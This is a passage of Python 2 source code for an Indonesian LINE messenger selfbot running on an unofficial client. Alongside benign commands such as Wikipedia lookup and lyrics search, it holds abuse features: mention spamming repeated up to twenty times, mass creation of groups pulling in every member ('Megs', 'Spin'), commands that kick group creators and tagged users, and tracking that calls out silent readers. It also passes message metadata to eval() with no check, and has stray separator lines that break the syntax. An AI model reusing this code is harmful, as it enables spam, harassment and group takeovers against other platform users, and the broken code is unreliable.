if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr1.sendText(msg.to,md)
kr1.sendMessage(msg)
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
#==========================[WIB]===========================
elif msg.text in ["Friendlist"]:
if msg.from_ in owner:
contactlist = kr1.getAllContactIds()
kontak = kr1.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Memlist"]:
if msg.from_ in owner:
kontak = kr1.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif "Friendinfo: " in msg.text:
if msg.from_ in owner:
saya = msg.text.replace('Friendinfo: ','')
gid = kr1.getAllContactIds()
for i in gid:
h = kr1.getContact(i).displayName
contact = kr1.getContact(i)
cu = kr1.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr1.sendText(msg.to,"Profile Picture " + contact.displayName)
kr1.sendImageWithURL(msg.to,image)
kr1.sendText(msg.to,"Cover " + contact.displayName)
kr1.sendImageWithURL(msg.to,path)
#==========================[WIB]===========================
elif "Friendpict: " in msg.text:
if msg.from_ in owner:
saya = msg.text.replace('Friendpict: ','')
gid = kr1.getAllContactIds()
for i in gid:
h = kr1.getContact(i).displayName
gna = kr1.getContact(i)
if h == saya:
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
#==========================[WIB]===========================
elif msg.text in ["Friendlistmid"]:
if msg.from_ in owner:
gruplist = kr1.getAllContactIds()
kontak = kr1.getContacts(gruplist)
num=1
msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Blocklist"]:
if msg.from_ in admin:
blockedlist = kr1.getBlockedContactIds()
kontak = kr1.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Gruplist"]:
if msg.from_ in admin:
gruplist = kr1.getGroupIdsJoined()
kontak = kr1.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Gruplistmid"]:
if msg.from_ in owner:
gruplist = kr1.getGroupIdsJoined()
kontak = kr1.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif "Grupimage: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupimage: ','')
gid = kr1.getGroupIdsJoined()
for i in gid:
h = kr1.getGroup(i).name
gna = kr1.getGroup(i)
if h == saya:
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
#==========================[WIB]===========================
elif "Grupname" in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupname','')
gid = kr1.getGroup(msg.to)
kr1.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
#==========================[WIB]===========================
elif "Grupid" in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupid','')
gid = kr1.getGroup(msg.to)
kr1.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
#==========================[WIB]===========================
elif "Grupinfo: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupinfo: ','')
gid = kr1.getGroupIdsJoined()
for i in gid:
h = kr1.getGroup(i).name
group = kr1.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr1.sendText(msg.to,md)
kr1.sendMessage(msg)
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
#==========================[WIB]===========================
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={"MENTION":'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
print "Spamtag Berhasil."
#==========================[WIB]===========================
elif "playstore " in msg.text.lower():
#if msg.from_ in admin:
tob = msg.text.lower().replace("playstore ","")
kr1.sendText(msg.to,"Sedang Mencari boss...")
kr1.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
kr1.sendText(msg.to,"Ketemu boss ^")
#==========================[WIB]===========================
elif 'wikipedia ' in msg.text.lower():
#if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr1.sendText(msg.to, pesan)
except:
try:
pesan="Teks nya kepanjangan! ketik link dibawah aja\n"
pesan+=wikipedia.page(wiki).url
kr1.sendText(msg.to, pesan)
except Exception as e:
kr1.sendText(msg.to, str(e))
==========================[WIB]===========================
elif "say " in msg.text.lower():
#if msg.from_ in admin:
say = msg.text.lower().replace("say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
#==========================[WIB]===========================
elif msg.text in ["Gift 8","Gift8","gift8"]:
#if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
kr1.sendMessage(msg)
elif msg.text in ["Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
kr1.sendMessage(msg)
elif msg.text in ["Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
kr1.sendMessage(msg)
elif msg.text in ["Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = kr1.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr1.findAndAddContactsByMid(gCreator)
kr1.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin:
ginfo = kr1.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr1.findAndAddContactsByMid(gCreator)
kr1.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#==========================[WIB]===========================
elif 'lirik ' in msg.text.lower():
#if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr1.sendText(msg.to, hasil)
except Exception as wak:
kr1.sendText(msg.to, str(wak))
#==========================[WIB]===========================
elif "Getcover @" in msg.text:
#if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr2.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
cu = kr1.channel.getCover(target)
path = str(cu)
kr1.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#==========================[WIB]===========================
elif "Idline: " in msg.text:
#if msg.from_ in admin:
msgg = msg.text.replace('idline: ','')
conn = kr1.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
kr1.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif "reinvite" in msg.text.split():
#if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
kr1.findAndAddContactsByMid(msg.to, grCans)
kr1.cancelGroupInvitation(msg.to, grCans)
kr1.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"No Invited")
else:
kr1.sendText(msg.to,"Error")
else:
pass
==========================[WIB]===========================
elif msg.text in ["Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
kr1.sendText(msg.to, rst)
==========================[WIB]===========================
elif "Image " in msg.text:
#if msg.from_ in admin:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
elif 'instagram ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "**INSTAGRAM INFO USER**\n"
details = "\n**INSTAGRAM INFO USER**"
kr1.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
kr1.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
kr1.sendText(msg.to, str(njer))
==========================[WIB]===========================
elif msg.text in ["aah","Aah"]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u4a361586c55ac4ef218a0a9b78b2f1b3',"}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["..."]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "',"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif "Ban @" in msg.text:
#if msg.from_ in admin:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
kr1.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif "Unban @" in msg.text:
#if msg.from_ in admin:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
kr1.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
kr1.sendText(msg.to,_nametarget + " Not In Blacklist")
#==========================[WIB]===========================
elif "Ban:" in msg.text:
#if msg.from_ in admin:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr1.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr1.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif "Unban:" in msg.text:
#if msg.from_ in admin:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr1.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr1.sendText(msg.to,_name + " Delete From Blacklist")
except:
kr1.sendText(msg.to,_name + " Not In Blacklist")
#==========================[WIB]===========================
elif msg.text in ["Clear"]:
#if msg.from_ in admin:
wait["blacklist"] = {}
kr1.sendText(msg.to,"Blacklist Telah Dibersihkan")
#==========================[WIB]===========================
elif msg.text in ["Ban:on"]:
#if msg.from_ in admin:
wait["wblacklist"] = True
kr1.sendText(msg.to,"Send Contact")
#==========================[WIB]===========================
elif msg.text in ["Unban:on"]:
#if msg.from_ in admin:
wait["dblacklist"] = True
kr1.sendText(msg.to,"Send Contact")
#==========================[WIB]===========================
elif msg.text in ["Banlist"]:
#if msg.from_ in admin:
if wait["blacklist"] == {}:
kr1.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr1.sendText(msg.to,"Daftar Banlist")
num=1
msgs="*Blacklist*"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, kr1.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"])
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Conban","Contactban","Contact ban"]:
#if msg.from_ in admin:
if wait["blacklist"] == {}:
kr1.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr1.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = kr1.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
kr1.sendMessage(M)
#==========================[]===========================
elif msg.text in ["Midban","Mid ban"]:
#if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
kr1.sendText(msg.to,cocoa)
#==========================[WIB]===========================
elif msg.text in ["scan blacklist","Scan blacklist"]:
#if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kr1.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
kr1.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==========================[WIB]===========================
elif "Spamtag @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Kr spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={"MENTION":'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
else:
pass
#==========================[WIB]===========================
elif ("Cium " in msg.text):
if msg.from_ in owner:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr1.kickoutFromGroup(msg.to,[target])
#kr1.inviteIntoGroup(msg.to,[target])
#kr1.cancelGroupInvitation(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
elif ("Aah " in msg.text):
if msg.from_ in owner:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
kr1.sendMessage(msg)
kr1.kickoutFromGroup(msg.to,[target])
#kr1.inviteIntoGroup(msg.to,[target])
kr1.cancelGroupInvitation(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif msg.text in ["Glist"]: #Melihat List Group
if msg.from_ in owner:
gids = kr1.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = kr1.getGroup(i).name
h += "[•]%s Member\n" % (kr1.getGroup(i).name +"👉"+str(len(kr1.getGroup(i).members)))
kr1.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["Glist2"]:
if msg.from_ in owner:
gid = kr1.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (kr1.getGroup(i).name,i)
kr1.sendText(msg.to,h)
#==========================[WIB]===========================
elif "Asupka " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Kr asupka ","")
if gid == "":
kr1.sendText(msg.to,"Invalid group id")
else:
try:
kr1.findAndAddContactsByMid(msg.from_)
kr1.inviteIntoGroup(gid,[msg.from_])
kr1.sendText(msg.to,"succes di invite boss, silahkan masuk...!!")
except:
kr1.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#==========================[WIB]===========================
elif "Megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("Kr megs ","")
ap = kr1.getGroups([msg.to])
semua = [contact.mid for contact in ap[0].members]
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
#==========================[WIB]===========================
elif "!megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("#megs ","")
ap = kr1.getGroups([msg.to])
semua = findAndAddContactsByMid(Mi_d)
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
klis=[kr1]
team=random.choice(klis)
kr1.findAndAddContactsByMid(Mi_d)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
team.findAndAddContactsByMid(Mi_d)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
#==========================[WIB]===========================
elif "recover" in msg.text:
if msg.from_ in owner:
thisgroup = kr1.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr1.createGroup("recover", mi_d)
kr1.sendText(msg.to,"Success recover")
#==========================[WIB]===========================
elif "Spin" in msg.text:
if msg.from_ in owner:
thisgroup = kr1.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.sendText(msg.to,"Success...!!!!")
#==========================[WIB]===========================
elif msg.text in ["Removechat"]:
if msg.from_ in owner:
kr1.removeAllMessages(op.param2)
kr1.removeAllMessages(op.param2)
kr1.sendText(msg.to,"Removed all chat Finish")
#==========================[WIB]===========================
elif msg.text in ["Muach"]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c',"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
if op.type == 17:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
except:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
kr1.kickoutFromGroup(op.param1,[op.param2])
kr1.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr1.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr1.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
kr1.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
kr1.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait['autoAdd'] == True:
if (wait['message'] in [""," ","\n",None]):
pass
else:
kr1.sendText(op.param1,str(wait['message']))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.kickoutFromGroup(op.param1,[op.param2])
kr1.updateGroup(G)
if op.type == 17:
if wait["Wc"] == True:
if op.param2 in Bots:
return
ginfo = kr1.getGroup(op.param1)
kr1.sendText(op.param1, "╔═════════════\nSelamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName + "\n╠═════════════\n" + "😊Semoga Betah Kak 😘 \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 17:
if wait["Wc2"] == True:
if op.param2 in Bots:
return
G = kr1.getGroup(op.param1)
h = kr1.getContact(op.param2)
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + h.pictureStatus)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if wait["Lv"] == True:
if op.param2 in Bots:
return
kr1.sendText(op.param1, "╔═════════════\nBaper Tuh Orang :v \nSemoga Bahagia ya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#------------------------------------------------------------------------------#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = kr1.getContact(op.param2).displayName
Np = kr1.getContact(op.param2).pictureStatus
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[0] + " ☜" + "\nNah jangan ngintip mulu 😁. . .\nGabung Chat yux 😉")
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[1] + " ☜" + "\nJangan ngintip.. 😏. . .\nMasuk ayox... 😆😂😛")
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
kr1.sendText(op.param1, "hallo.. " + "☞ " + Name + " ☜" + "\nJangan ngintip aja\nMasuk gabung chat ya...😋 😝")
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
pass
